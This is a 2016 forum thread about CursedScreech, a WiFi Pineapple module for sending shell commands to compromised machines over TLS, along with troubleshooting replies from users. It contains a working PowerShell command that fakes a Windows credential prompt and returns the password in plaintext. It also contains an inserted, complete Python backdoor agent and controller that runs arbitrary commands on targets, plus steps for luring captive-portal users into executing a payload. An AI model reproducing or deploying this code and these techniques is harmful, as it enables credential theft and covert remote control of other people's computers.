sud0nick Posted February 25, 2016

Edit: First major release is now on my GitHub at https://github.com/sud0nick/CursedScreech. The C# API, Python API, and documentation are also there.

I started working on a new module and I'll keep this thread up to date as I work on it. I'm much farther along with it than I thought I would be at this point so hopefully it won't be too long before its initial release.

Purpose:
• Securely control compromised systems on the network by sending commands to them all at once, one at a time, or to a custom group.

Features:
• Commands sent via TLS (level negotiated by systems; highest available is chosen)
• Execute shell commands on all targets at once or those selected and receive responses individually.
• Store commands for quick reuse.
• Utilize the Certificate Store in Papers for TLS keys.
• Multi-threaded Python scripts that listen for compromised systems on the network and do your bidding.

This is an advanced module that will require some programming knowledge (not to use the module itself but for payloads that are required). I plan on including a small API that you can import into your payload so it will work seamlessly with CursedScreech.

Default EZ Commands are as follows:
Get PS Version
Get SysInfo
Windows PSv3+ Phish
Windows PSv2- Phish
Windows Alert
Logoff User
Restart
Shutdown
Add User
Change User Password
Delete User
Enable RDP
Add User to Remote Desktop Users Group
Add User to Administrators Group

And a video tutorial
sud0nick (Author) Posted February 26, 2016

Since I've had a lot of time on my hands I've made some good progress with this module. Still not complete but here are a couple screenshots of the types of attacks you'll be able to perform with it. In this first image I issued a PowerShell command to one of my targets (which was the same system I was using) which prompted for credentials using a PSCredential object. This particular command decodes the password and sends it back in plaintext with the username (no worries though cus it's over TLS 1.2).

Command Issued: powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"

Then I issued powershell "Get-Process" just to add more content to the example. Here is the screenshot of the returned data.

I hope to have an initial release on GitHub by next week. I probably won't release to the Module Manager until I get an API developed for payloads to use with this module.
dustbyter Posted February 26, 2016

What does your agent look like that sits on the compromised pc? Will it not really matter what the agent is as long as it implements the API to talk back to the module? I can see this as being a universal C&C panel that can control any agent on a machine that decides to implement the interface you will expose through the API.
sud0nick (Author) Posted February 26, 2016

What does your agent look like that sits on the compromised pc?

Right now I have two custom programs, one written in C# and the other in Python. I prefer C# since I can compile everything into a single executable (even the certificates) but I know not everyone is comfortable with C#.

Will it not really matter what the agent is as long as it implements the API to talk back to the module?

That's the idea. The way I plan on implementing this is to first write two separate libraries (one for C# and one for Python) and include them with the module. Each time the settings of the module are modified the library code will be updated to match these settings. Then you'll be presented with the option to download the updated libraries so they can easily be imported into your projects. Any time you modify the settings you'll need to download and re-import the library unless you know which settings in the code to modify (which is honestly only a couple variables and will be super simple).

The main goal is to be able to push commands out to all compromised systems on the network no matter how you choose to compromise those machines, similar to a mini botnet. I will implement stored commands that can be issued as keywords and translate into system commands (similar to how Foxtrot did with his module, Commander). So, for instance, you could shut down all machines on the network at once, phish for all of their passwords, or select just a few of them to target.

There's still a lot to be done in making this module more user friendly but as you can see from the pictures in my last post the backend is functional. I'll be sure to do a video demonstrating all features and how to implement the API in your own code before I release it.
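The two posts above describe the overall design (an agent on each target that connects back over TLS, takes a shell command, and returns the output, with the TLS keys coming from the Papers store) and show one such command, the Get-Credential phish. The following is an added example of that shape, not CursedScreech's own code or API. Everything in it is assumed: the length-prefixed JSON framing, the "hello"/"cmd"/"result"/"bye" message types, and the function names. The one point worth taking from it is the TLS context: because the agent will execute whatever it is told, both ends should require the peer's certificate (mutual TLS), and the "highest available is chosen" negotiation should have a floor, otherwise an old host can pull the session down to TLS 1.0.

```python
"""Added example: a minimal mutually-authenticated TLS command agent/controller.
Not the CursedScreech code; the framing, message shapes and names are assumptions."""
import json
import platform
import socket
import ssl
import struct
import subprocess
import threading


def build_context(server_side, cert_file=None, key_file=None, ca_file=None):
    """TLS settings both ends should share (assumed policy, not the module's).

    CERT_REQUIRED on both sides means the controller only talks to agents carrying
    a key pair it issued (the Target.pfx role), and agents only obey a controller
    whose certificate chains to the same CA. The TLS 1.2 floor stops the
    'highest available' negotiation from landing on TLS 1.0 against an old host.
    """
    purpose = ssl.Purpose.CLIENT_AUTH if server_side else ssl.Purpose.SERVER_AUTH
    ctx = ssl.create_default_context(purpose, cafile=ca_file)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.verify_mode = ssl.CERT_REQUIRED
    # Assumption: peers are identified by the CA, not by a DNS name, so the
    # hostname check is turned off (verification of the chain still happens).
    ctx.check_hostname = False
    if cert_file:
        ctx.load_cert_chain(cert_file, key_file)
    return ctx


def send_frame(sock, obj):
    """4-byte big-endian length prefix followed by a JSON body (assumed framing)."""
    data = json.dumps(obj).encode()
    sock.sendall(struct.pack("!I", len(data)) + data)


def _recv_exact(sock, n):
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            return None          # peer closed mid-frame
        buf += chunk
    return bytes(buf)


def recv_frame(sock, limit=1 << 20):
    hdr = _recv_exact(sock, 4)
    if hdr is None:
        return None
    (n,) = struct.unpack("!I", hdr)
    if n > limit:                # refuse to allocate on a bogus length
        raise ValueError("frame too large: %d" % n)
    body = _recv_exact(sock, n)
    return None if body is None else json.loads(body.decode())


def run_command(cmd, timeout=30):
    """Run one shell command on the target and capture its output, the way the
    Get-Credential and Get-Process examples above are run via powershell "..."."""
    try:
        p = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout)
        return {"rc": p.returncode, "out": p.stdout, "err": p.stderr}
    except subprocess.TimeoutExpired:
        return {"rc": None, "out": "", "err": "timeout after %ds" % timeout}


def agent_loop(sock):
    """Target side: announce itself, then serve commands until told to stop."""
    send_frame(sock, {"type": "hello", "host": platform.node(), "os": platform.system()})
    while True:
        msg = recv_frame(sock)
        if msg is None or msg.get("type") == "bye":
            return
        if msg.get("type") == "cmd":
            result = {"type": "result", "id": msg.get("id")}
            result.update(run_command(msg["cmd"]))
            send_frame(sock, result)


def controller_session(sock, commands):
    """Controller side: read the hello, issue each command, collect each reply."""
    hello = recv_frame(sock)
    results = []
    for i, cmd in enumerate(commands):
        send_frame(sock, {"type": "cmd", "id": i, "cmd": cmd})
        results.append(recv_frame(sock))
    send_frame(sock, {"type": "bye"})
    return hello, results


def demo(commands=("echo cursed",)):
    """Offline exchange over a socketpair (no TLS) so the protocol can be exercised.
    In use, each end wraps its socket with build_context(...).wrap_socket(...)."""
    a, b = socket.socketpair()
    t = threading.Thread(target=agent_loop, args=(a,), daemon=True)
    t.start()
    hello, results = controller_session(b, list(commands))
    t.join(5)
    a.close()
    b.close()
    return hello, results


if __name__ == "__main__":
    print(demo(["echo cursed", "hostname"]))
```

The demo runs the exchange over a socketpair so it works without certificates; with a real deployment the controller wraps its listening socket with `build_context(True, ...)` and the agent its outbound socket with `build_context(False, ...)`, and the Windows credential phish from the post is simply one more string sent as a `cmd` frame.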
ale Posted February 27, 2016

Wow sud0nick! Great moves! keep it up! proud of you!
dustbyter Posted February 27, 2016

Pretty cool! I myself also prefer C# over Python... but had to learn some Python since getting the pineapples. Looking forward to this!
sud0nick (Author) Posted February 28, 2016

Wow sud0nick! Great moves! keep it up! proud of you!

Thanks, ale! I'm really trying to come up with serious hacking tools. I may not have zero days yet but I feel I'm improving.

Pretty cool! I myself also prefer C# over Python... but had to learn some Python since getting the pineapples. Looking forward to this!

I prefer the result of C# (self-contained .exe) but I still think Python is much easier to implement.

I think setting next week as an initial release time was a little ambitious of me. I'm definitely making a lot of progress but I'm new to writing APIs. I'm working on the C# one now but I have a feeling it's going to take a bit of testing. Here is my todo list in order of execution:

Finish C# API
Write equivalent Python library
Put finishing touches on web interface
Test, Test, Test
Create documentation and video guide
Release on Module Manager

I'll update this post by crossing things off the list as I finish them.

Edit: A test version is now on my GitHub at https://github.com/sud0nick/CursedScreech. The C# API, Python API, and documentation are also there.
sud0nick (Author) Posted March 5, 2016

The first major release of CursedScreech is on GitHub (link in the first post). I have performed a lot of tests and tweaked many things over the last few days. I won't submit it to the module manager until I get a video made for it but I will hopefully have that done by the end of the weekend.

A couple things to keep in mind:

This module can only be used on the TETRA for now. I believe there are some underlying SSL problems on the NANO that still haven't been resolved and TLS/SSL is required for this module (see below for more).

Python takes a few seconds to load for some reason. I've submitted an official bug report with results from a test Python script that showed it takes about 7 seconds just for Python to start up. Because of this, be patient when starting Kuro. It will let you know when it's connecting, when a connection to a target has been established, and when it's ready for you to start entering commands.

I've put quite a bit of effort into this module so I hope you all find it very useful. For those that only use a NANO, and won't be able to use this module, I plan on porting this to a Linux utility so you can still use it in your pentests just without the pretty front end.

Please download a copy from GitHub, test it out, and report any issues here. If there is anything to fix I will make sure it happens before I submit it to the module manager.

Edit: v1 has been submitted to the module manager.
sud0nick (Author) Posted March 7, 2016

CursedScreech is now available on the Module Manager!
513RR4 Posted March 10, 2016

Hi sud0nick! Your module seems amazing!! But I have some problems: I followed all your instructions in the video to create the payload but when I execute it, it says "payload has stopped working". I tried it on W10 x64 and a virtual machine with W7 Ultimate x32 with the TETRA 1.0.2. I used the default settings in the module and created the certificates with the Papers module. Created unencrypted keys for Kuro. And used Export keys to PKCS#12 container for Target. Please help me.
sud0nick (Author) Posted March 11, 2016

Do you mean the payload stops working on the target? It should work by default on Win 10 but maybe in Win 7 it needs an upgraded version of .NET? Could you give more details?
513RR4 Posted March 11, 2016

Yes, it stops on the target computer. I pressed the debug button in Windows and got redirected to Visual Studio, which shows this.
sud0nick (Author) Posted March 11, 2016

Could you post your code for the payload?
sud0nick (Author) Posted March 12, 2016

It looks like your namespace is payload (with a lowercase p) but you are referencing the .pfx with Payload (with a capital P). Make sure they match so it can access the keys for the target.
513RR4 Posted March 12, 2016

It looks like your namespace is payload (with a lowercase p) but you are referencing the .pfx with Payload (with a capital P). Make sure they match so it can access the keys for the target.

Ok, I'll try it and comment the results. Thanks for your help.
sud0nick (Author) Posted March 12, 2016

On second thought it needs to match the name of the solution/project. Don't change the namespace name but change the reference to the keys. It should be payload.Target.pfx
513RR4 Posted March 12, 2016

I created a new "Payload" (with capital P); now the namespace is equal to the reference to the keys but still with the same issue.
sud0nick (Author) Posted March 12, 2016

Did you make sure to make the pfx an embedded resource? What happens if you run the payload within VS? It should show you the line of code that's failing.
513RR4 Posted March 13, 2016

Ok, when I created the new Payload I forgot to put the Target.pfx as an embedded resource. I changed that and now the Payload runs without problems. I'm sorry for my noob mistakes but I am happy for your help, thanks.

When I run the working Payload on a target machine, in this case a virtual machine with W7 x32 that is connected to the WiFi Pineapple network, I start Sein and nothing happens. So I watched your video again and saw that your target IP address is 192.168.1.X, so I connected the W7 virtual machine to my home network (where I have the TETRA connected via ethernet) and the module works very well. I am confused about this. Why is the target not recognised by Sein when it is connected to the Pineapple network?
sud0nick (Author) Posted March 13, 2016

Hmm, I'll have to check on this. It seems to work for me. I just tried with the Python payload on my Mac connected on the Pineapple's network and it showed up in Sein.
lild4d Posted March 23, 2016

These are the kind of modules I've been waiting for
sud0nick (Author) Posted July 24, 2016

I've updated the API in this module to include a class that integrates with the Payloader injection set in Portal Auth. What this means is you can now add authorization to your payloads to force your targets to execute them. A brief example follows:

• First clone a captive portal with the Payloader injection set
• Build your payload in Cursed Screech by downloading the pre-built payload files and following my video tutorials
• Turn on PASS in Portal Auth
• Attach your payload to your captive portal
• Turn on Evil Portal

When the target reaches your cloned portal they will be prompted to enter an access key which they can receive by downloading and executing your payload. When they execute the payload, it will reach out to the PASS server in Portal Auth which will generate the access key, store it, and return it to the payload. The user will enter the key in the captive portal and gain access to the network. At this point all of the normal CursedScreech stuff will come into play.

This update is only available on my GitHub for now. The reason for this is I've run into an issue I can't seem to figure out (the same issue 513RR4 had a few posts above). When I tested this back in March I couldn't reproduce the problem but months later it seems to be plaguing me. I need someone else to perform some tests if they have time and let me know if they see their targets appear in the target list. If you need any help in testing you can ask me or just watch the CursedScreech tutorial video posted at the top of this thread. The video will walk you through everything. Once I have this issue figured out I will push an update to the module manager.